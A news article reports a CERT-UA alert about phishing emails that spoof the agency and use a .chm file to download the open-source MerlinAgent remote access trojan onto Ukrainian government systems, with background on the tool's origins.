Cyberwarfare / Nation-State Attacks , Fraud Management & Cybercrime , Social Engineering
Kyiv Cyber Defenders Spot Open-Source RAT in Phishing Emails
Threat Actor Coaxes Users Into Downloading MerlinAgentHackers attempting to spy on the Ukrainian government are using an open-source remote access Trojan, said Kyiv cyber defenders.
See Also: OnDemand | 2024 Phishing Insights: What 11.9 Million User Behaviors Reveal About Your Risk
The Computer Emergency Response Team of Ukraine said in a Saturday alert that hackers from a threat actor it tracks as UAC-0154 had spoofed the CERT-UA in phishing emails with the subject line "CERT-UA recommendations on MS Office program settings."
These phishing mails come with a .chm
file - a compressed HTML document in a proprietary Microsoft format primarily used in software documentation. The file executes JavaScript code that uses a PowerShell script that downloads an executable MerlinAgent, the open-source RAT.
Close observers of the conflict in Ukraine sparked by Russia's February 2022 invasion of its European neighbor have said Kremlin hackers are primarily focused on espionage. Ukraine is currently weeks into a counteroffensive against Russian positions in its eastern provinces (see: Russian Hackers Focused on Espionage, Not System Destruction).
MerlinAgent, available on GitHub, was a project developed by penetration tester Russel Van Tuyl, who said he had programmed it after writing a Sans Institute dissertation about web application attacks over the HTTP/2 protocol.
Van Tuyl programmed Merlin in the GoLang programming language. "This means we can use a single code base and put agents on most any machine we encounter, having them all call back to whatever platform we decide to run the listening post (vs only being able to put agents on Windows, or only being able to run listening posts on Linux)," a security blogger using the name Action Dan wrote in 2018.
Merlin's advanced logging features are useful for capturing details after an operation has concluded, the blogger said.